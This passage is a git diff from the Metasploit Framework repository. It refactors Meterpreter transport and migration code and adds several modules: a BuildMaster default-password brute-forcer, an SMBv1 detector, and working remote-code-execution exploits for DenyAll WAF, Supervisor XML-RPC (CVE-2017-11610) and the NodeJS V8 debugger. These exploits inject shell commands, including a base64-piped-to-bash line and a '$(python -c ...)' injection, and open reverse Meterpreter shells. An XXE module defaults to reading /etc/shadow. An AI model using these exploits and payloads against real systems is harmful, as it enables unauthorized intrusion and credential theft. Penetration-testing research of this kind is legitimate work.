Rex::Text.rand_text_alpha_lower(5 + rand(5))) - - if socket_path.length > UNIX_PATH_MAX - 1 - raise RuntimeError, 'The writable dir is too long', caller - end - - pos = migrate_payload.index(DEFAULT_SOCK_PATH) - - if pos.nil? - raise RuntimeError, 'The meterpreter binary is wrong', caller - end - - migrate_payload[pos, socket_path.length + 1] = socket_path + "\x00" - - ep = elf_ep(migrate_payload) - request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000) - request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep) - request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib]) - end - request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid) request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length) request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib]) @@ -722,11 +676,8 @@ class ClientCore < Extension # Indicates if the given transport is a valid transport option. # def valid_transport?(transport) - if transport - VALID_TRANSPORTS.has_key?(transport.downcase) - else - false - end + return false if transport.nil? + VALID_TRANSPORTS.include?(transport.downcase) end # @@ -830,11 +781,11 @@ private opts[:lhost] = nil end - transport = VALID_TRANSPORTS[opts[:transport]] + transport = opts[:transport].downcase request = Packet.create_request(method) - scheme = opts[:transport].split('_')[1] + scheme = transport.split('_')[1] url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}" if opts[:luri] && opts[:luri].length > 0 @@ -864,7 +815,7 @@ private end # do more magic work for http(s) payloads - unless opts[:transport].ends_with?('tcp') + unless transport.ends_with?('tcp') if opts[:uri] url << '/' unless opts[:uri].start_with?('/') url << opts[:uri] @@ -878,7 +829,7 @@ private opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua]) - if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert] + if transport == 'reverse_https' && opts[:cert] hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert]) request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash) end @@ -902,24 +853,7 @@ private request.add_tlv(TLV_TYPE_TRANS_TYPE, transport) request.add_tlv(TLV_TYPE_TRANS_URL, url) - return request - end - - - # - # Create a full migration payload specific to the target process. - # - def generate_migrate_payload(target_process) - case client.platform - when 'windows' - blob = generate_migrate_windows_payload(target_process) - when 'linux' - blob = generate_migrate_linux_payload - else - raise RuntimeError, "Unsupported platform '#{client.platform}'" - end - - blob + request end # @@ -945,34 +879,18 @@ private end # - # Create a full Linux-specific migration payload specific to the target process. + # Create a full migration payload specific to the target process. # - def generate_migrate_linux_payload - MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin') - end - - # - # Determine the elf entry poitn for the given payload. - # - def elf_ep(payload) - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - ep = elf.elf_header.e_entry - return ep - end - - # - # Get the tmp folder for the session. - # - def tmp_folder - tmp = client.sys.config.getenv('TMPDIR') - - if tmp.to_s.strip.empty? - tmp = '/tmp' + def generate_migrate_payload(target_process) + case client.platform + when 'windows' + blob = generate_migrate_windows_payload(target_process) + else + raise RuntimeError, "Unsupported platform '#{client.platform}'" end - tmp + blob end - end end; end; end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb index 53a18e1aa3..83aa6694da 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb @@ -170,10 +170,7 @@ class Config ret = [] res = client.send_request(req) res.each(TLV_TYPE_PRIVILEGE) do |p| - ret << { - priv: p.get_tlv_value(TLV_TYPE_PRIVILEGE_NAME), - enabled: p.get_tlv_value(TLV_TYPE_PRIVILEGE_ENABLED), - } + ret << p.value end ret end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index 6ec7d0b180..5a00e8a111 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb @@ -16,9 +16,7 @@ TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600 TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601 TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630 TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631 -TLV_TYPE_PRIVILEGE = TLV_META_TYPE_GROUP | 632 -TLV_TYPE_PRIVILEGE_NAME = TLV_META_TYPE_STRING | 633 -TLV_TYPE_PRIVILEGE_ENABLED = TLV_META_TYPE_BOOL | 634 +TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632 ## # diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 054ead9fa6..1dc678cc67 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -142,7 +142,7 @@ class Console::CommandDispatcher::Core print_line(@@pivot_opts.usage) print_line print_line('Supported pivot types:') - print_line(' - pipe (using named pipes over SMB)') + print_line(' - pipe (using named pipes over SMB)') print_line('Supported arhiectures:') @@pivot_supported_archs.each do |a| print_line(' - ' + a) @@ -757,7 +757,7 @@ class Console::CommandDispatcher::Core # Arguments for transport switching # @@transport_opts = Rex::Parser::Arguments.new( - '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}"], + '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.join(', ')}"], '-l' => [true, 'LHOST parameter (for reverse transports)'], '-p' => [true, 'LPORT parameter'], '-i' => [true, 'Specify transport by index (currently supported: remove)'], diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index c1d394bca0..5e7e987eda 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -899,12 +899,12 @@ class Console::CommandDispatcher::Stdapi::Sys 'Header' => 'Enabled Process Privileges', 'Indent' => 0, 'SortIndex' => 1, - 'Columns' => ['Priv Name', 'Enabled'] + 'Columns' => ['Name'] ) privs = client.sys.config.getprivs client.sys.config.getprivs.each do |priv| - table << [priv[:priv], priv[:enabled].to_s] + table << [priv] end print_line diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cb1c245860..b3c110bb1e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -191,9 +191,9 @@ class Client # Closes the connection to the remote server. # def close - if (self.conn) + if self.conn && !self.conn.closed? self.conn.shutdown - self.conn.close unless self.conn.closed? + self.conn.close end self.conn = nil diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 3d2a99241b..daa3bade99 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.7' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.8' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' # Needed by msfgui and other rpc components diff --git a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb index 8a4d8c337a..b9bf75753f 100644 --- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb +++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb @@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary @versions.each do |version| print_status("#{host}:#{rport} fuzzing version #{version} control messages (mode 6)") @mode_6_operations.each do |op| - request = Rex::Proto::NTP.ntp_control(version, op) + request = Rex::Proto::NTP.ntp_control(version, op).to_binary_s what = "#{request.size}-byte version #{version} mode 6 op #{op} message" vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}") responses = probe(host, datastore['RPORT'].to_i, request) @@ -114,7 +114,7 @@ class MetasploitModule < Msf::Auxiliary print_status("#{host}:#{rport} fuzzing version #{version} private messages (mode 7)") @mode_7_implementations.each do |implementation| @mode_7_request_codes.each do |request_code| - request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188) + request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188).to_binary_s what = "#{request.size}-byte version #{version} mode 7 imp #{implementation} req #{request_code} message" vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}") responses = probe(host, datastore['RPORT'].to_i, request) @@ -164,6 +164,7 @@ class MetasploitModule < Msf::Auxiliary # TODO: is there a better way to pick this size? Should more than one be tried? request.payload = SecureRandom.random_bytes(16) end + request = request.to_binary_s what = "#{request.size}-byte #{short ? 'short ' : nil}version #{version} mode #{mode} message" vprint_status("#{host}:#{rport} probing with #{what}") responses = probe(host, datastore['RPORT'].to_i, request) diff --git a/modules/auxiliary/gather/emc_cta_xxe.rb b/modules/auxiliary/gather/emc_cta_xxe.rb index 50db85b880..e34a632f26 100644 --- a/modules/auxiliary/gather/emc_cta_xxe.rb +++ b/modules/auxiliary/gather/emc_cta_xxe.rb @@ -30,10 +30,10 @@ class MetasploitModule < Msf::Auxiliary [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), - OptString.new('SSLVersion', [true, 'SSL version', 'TLS1']), OptString.new('TARGETURI', [ true, "Base directory path", '/']), OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]), - ]) + ] + ) end def run diff --git a/modules/auxiliary/scanner/http/buildmaster_login.rb b/modules/auxiliary/scanner/http/buildmaster_login.rb new file mode 100644 index 0000000000..b29d37dc1a --- /dev/null +++ b/modules/auxiliary/scanner/http/buildmaster_login.rb @@ -0,0 +1,96 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Inedo BuildMaster Login Scanner', + 'Description' => %{ + This module will attempt to authenticate to BuildMaster. There is a default user 'Admin' + which has the default password 'Admin'. + }, + 'Author' => [ 'James Otten ' ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => { 'VERBOSE' => true }) + ) + + register_options( + [ + Opt::RPORT(81), + OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']), + OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin']) + ] + ) + end + + def run_host(ip) + return unless buildmaster? + + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + def buildmaster? + begin + res = send_request_cgi('uri' => '/log-in') + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{peer} - HTTP Connection Failed") + return false + end + + if res && res.code == 200 && res.body.include?('BuildMaster_Version') + version = res.body.scan(%r{(.*)}).flatten.first + print_good("#{peer} - Identified BuildMaster #{version}") + return true + else + print_error("#{peer} - Application does not appear to be BuildMaster") + return false + end + end + + def login_succeeded?(res) + if res && res.code == 200 + body = JSON.parse(res.body) + return body.key?('succeeded') && body['succeeded'] + end + false + rescue + false + end + + def do_login(user, pass) + print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn', + 'method' => 'POST', + 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }, + 'vars_post' => + { + 'userName' => user, + 'password' => pass + } + } + ) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if login_succeeded?(res) + print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}") + store_valid_credential(user: user, private: pass) + else + print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}") + end + end +end diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb index 664e90f57e..6d103377aa 100644 --- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb @@ -13,23 +13,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'Nessus NTP Login Utility', - 'Description' => 'This module attempts to authenticate to a Nessus NTP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(1241), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'Nessus NTP Login Utility', + 'Description' => 'This module attempts to authenticate to a Nessus NTP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(1241), + OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users") + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb index 5bf19b584c..86da3f4c9f 100644 --- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb @@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'OpenVAS OMP Login Utility', - 'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(9390), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'OpenVAS OMP Login Utility', + 'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9390), + OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb index 26a8ce7937..52941770b7 100644 --- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb @@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'OpenVAS OTP Login Utility', - 'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(9391), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'OpenVAS OTP Login Utility', + 'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9391), + OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/smb/smb1.rb b/modules/auxiliary/scanner/smb/smb1.rb new file mode 100644 index 0000000000..0e52f9f879 --- /dev/null +++ b/modules/auxiliary/scanner/smb/smb1.rb @@ -0,0 +1,76 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + # Exploit mixins should go first + include Msf::Exploit::Remote::Tcp + + # Scanner mixin should be near last + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Aliases for common classes + SIMPLE = Rex::Proto::SMB::SimpleClient + XCEPT = Rex::Proto::SMB::Exceptions + CONST = Rex::Proto::SMB::Constants + + def initialize + super( + 'Name' => 'SMBv1 Protocol Detection', + 'Description' => 'Detect systems that support the SMBv1 protocol', + 'Author' => 'Chance Johnson @loftwing', + 'License' => MSF_LICENSE + ) + + register_options([ Opt::RPORT(445) ]) + end + + # Modified from smb2 module by @hdm + # Fingerprint a single host + def run_host(ip) + begin + connect + + # Only accept NT LM 0.12 dialect and WfW3.0 + dialects = ['PC NETWORK PROGRAM 1.0', + 'LANMAN1.0', + 'Windows for Workgroups 3.1a', + 'LM1.2X002', + 'LANMAN2.1', + 'NT LM 0.12'] + data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('') + + pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct + pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE + pkt['Payload']['SMB'].v['Flags1'] = 0x08 + pkt['Payload']['SMB'].v['Flags2'] = 0xc801 + pkt['Payload'].v['Payload'] = data + + pkt['Payload']['SMB'].v['ProcessID'] = rand(0x10000) + pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000) + + sock.put(pkt.to_s) + res = sock.get_once + # expecting \xff instead of \xfe + if res && res.index("\xffSMB") + print_good("#{ip} supports SMBv1 dialect.") + report_note( + host: ip, + proto: 'tcp', + sname: 'smb1', + port: rport, + type: "supports SMB 1" + ) + end + rescue ::Rex::ConnectionError + rescue EOFError + rescue Errno::ECONNRESET + rescue ::Exception => e + print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}") + ensure + disconnect + end + end +end diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 11686cd943..474caddd27 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -124,11 +124,15 @@ class MetasploitModule < Msf::Auxiliary ) end - rescue ::Rex::ConnectionError + rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e + print_error("A network issue has occurred: #{e.message}") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") rescue Timeout::Error print_error("#{target_host}:#{rport} Timed out after #{to} seconds") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") rescue ::Exception => e print_error("#{target_host}:#{rport} Error: #{e} #{e.backtrace}") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") ensure disconnect end diff --git a/modules/exploits/linux/http/denyall_waf_exec.rb b/modules/exploits/linux/http/denyall_waf_exec.rb new file mode 100644 index 0000000000..469144d3d6 --- /dev/null +++ b/modules/exploits/linux/http/denyall_waf_exec.rb @@ -0,0 +1,103 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "DenyAll Web Application Firewall Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a + terminal command under the context of the web server user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 3001, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Sep 19 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/']) + ] + ) + end + + def get_token + # Taking token by exploiting bug on first endpoint. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'), + 'vars_get' => { + 'applianceUid' => 'LOCALUID', + 'typeOf' => 'debug' + } + }) + + if res && res.code == 200 && res.body.include?("iToken") + res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0] + else + nil + end + end + + def check + # If we've managed to get token, that means target is most likely vulnerable. + token = get_token + if token.nil? + Exploit::CheckCode::Safe + else + Exploit::CheckCode::Appears + end + end + + def exploit + # Get iToken from unauthenticated accessible endpoint + print_status('Extracting iToken value') + token = get_token + + if token.nil? + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + else + print_good("Awesome. iToken value = #{token}") + end + + # Accessing to the vulnerable second endpoint where we have command injection with valid iToken + print_status('Trigerring command injection vulnerability with iToken value.') + r = rand_text_alpha(5 + rand(3)); + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'), + 'vars_post' => { + 'iToken' => token, + 'tag' => 'tunnel', + 'stime' => r, + 'type' => "#{r}$(python -c \"#{payload.encoded}\")" + } + }) + + end +end diff --git a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb new file mode 100644 index 0000000000..3f28f6f321 --- /dev/null +++ b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb @@ -0,0 +1,169 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability in the Supervisor process control software, where an authenticated client + can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. + The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this + may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been + configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Calum Hutton ' + ], + 'References' => + [ + ['URL', 'https://github.com/Supervisor/supervisor/issues/964'], + ['URL', 'https://www.debian.org/security/2017/dsa-3942'], + ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'], + ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'], + ['CVE', '2017-11610'] + ], + 'Platform' => 'linux', + 'Targets' => + [ + ['3.0a1-3.3.2', {}] + ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'DefaultOptions' => + { + 'RPORT' => 9001, + 'Payload' => 'linux/x64/meterpreter/reverse_tcp', + }, + 'Privileged' => false, + 'DisclosureDate' => 'Jul 19 2017', + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(9001), + OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']), + OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']), + OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']), + ] + ) + end + + def check_version(version) + if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1') + return true + else + return false + end + end + + def check + + print_status('Extracting version from web interface..') + + params = { + 'method' => 'GET', + 'uri' => normalize_uri('/') + } + if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? + print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) + end + res = send_request_cgi(params) + + if res + if res.code == 200 + match = res.body.match(/(\d+\.[\dab]\.\d+)<\/span>/) + if match + version = Gem::Version.new(match[1]) + if check_version(version) + print_good("Vulnerable version found: #{version}") + return Exploit::CheckCode::Appears + else + print_bad("Version #{version} is not vulnerable") + return Exploit::CheckCode::Safe + end + else + print_bad('Could not extract version number from web interface') + return Exploit::CheckCode::Unknown + end + elsif res.code == 401 + print_bad("Authentication failed: #{res.code} response") + return Exploit::CheckCode::Safe + else + print_bad("Unexpected HTTP code: #{res.code} response") + return Exploit::CheckCode::Unknown + end + else + print_bad('Error connecting to web interface') + return Exploit::CheckCode::Unknown + end + + end + + def execute_command(cmd, opts = {}) + + # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server + # Credit to the following urls for the os.system() payload + # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610 + # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html + xml_payload = %{ + + supervisor.supervisord.options.warnings.linecache.os.system + + + echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 & + + +} + + # Send the XML-RPC payload via POST to the specified endpoint + endpoint_path = target_uri.path + print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}") + + params = { + 'method' => 'POST', + 'uri' => normalize_uri(endpoint_path), + 'ctype' => 'text/xml', + 'headers' => {'Accept' => 'text/xml'}, + 'data' => xml_payload, + 'encode_params' => false + } + if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? + print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) + end + return send_request_cgi(params, timeout=5) + + end + + def exploit + + res = execute_cmdstager(:linemax => 800) + + if res + if res.code == 401 + fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response") + elsif res.code == 404 + fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response") + else + fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response") + end + else + print_good('Request returned without status code, usually indicates success. Passing to handler..') + handler + end + + end + +end diff --git a/modules/exploits/multi/misc/nodejs_v8_debugger.rb b/modules/exploits/multi/misc/nodejs_v8_debugger.rb new file mode 100644 index 0000000000..ac1e5b4573 --- /dev/null +++ b/modules/exploits/multi/misc/nodejs_v8_debugger.rb @@ -0,0 +1,90 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + + MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n" + + def initialize(info={}) + super(update_info(info, + 'Name' => "NodeJS Debugger Command Injection", + 'Description' => %q{ + This module uses the "evaluate" request type of the NodeJS V8 + debugger protocol (version 1) to evaluate arbitrary JS and + call out to other system commands. The port (default 5858) is + not exposed non-locally in default configurations, but may be + exposed either intentionally or via misconfiguration. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Patrick Thomas ' ], + 'References' => + [ + [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ], + [ 'URL', 'https://github.com/nodejs/node/pull/8106' ] + ], + 'Targets' => + [ + ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ], + ], + 'Privileged' => false, + 'DisclosureDate' => "Aug 15 2016", + 'DefaultTarget' => 0) + ) + + register_options( + [ + Opt::RPORT(5858) + ]) + end + + def make_eval_message + msg_body = { seq: 1, + type: 'request', + command: 'evaluate', + arguments: { expression: payload.encoded, + global: true, + maxStringLength:-1 + } + }.to_json + msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length} + msg_header + msg_body + end + + def check + connect + res = sock.get_once + disconnect + + if res.include? "V8-Version" and res.include? "Protocol-Version: 1" + vprint_status("Got debugger handshake:\n#{res}") + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Unknown + end + + def exploit + connect + # must consume incoming handshake before sending payload + buf = sock.get_once + msg = make_eval_message + print_status("Sending #{msg.length} byte payload...") + vprint_status("#{msg}") + sock.put(msg) + buf = sock.get_once + + if buf.include? '"command":"evaluate","success":true' + print_status("Got success response") + elsif buf.include? '"command":"evaluate","success":false' + print_error("Got failure response: #{buf}") + else + print_error("Got unexpected response: #{buf}") + end + end + +end diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index 83a3be2b05..47e00c37e7 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -18,7 +18,7 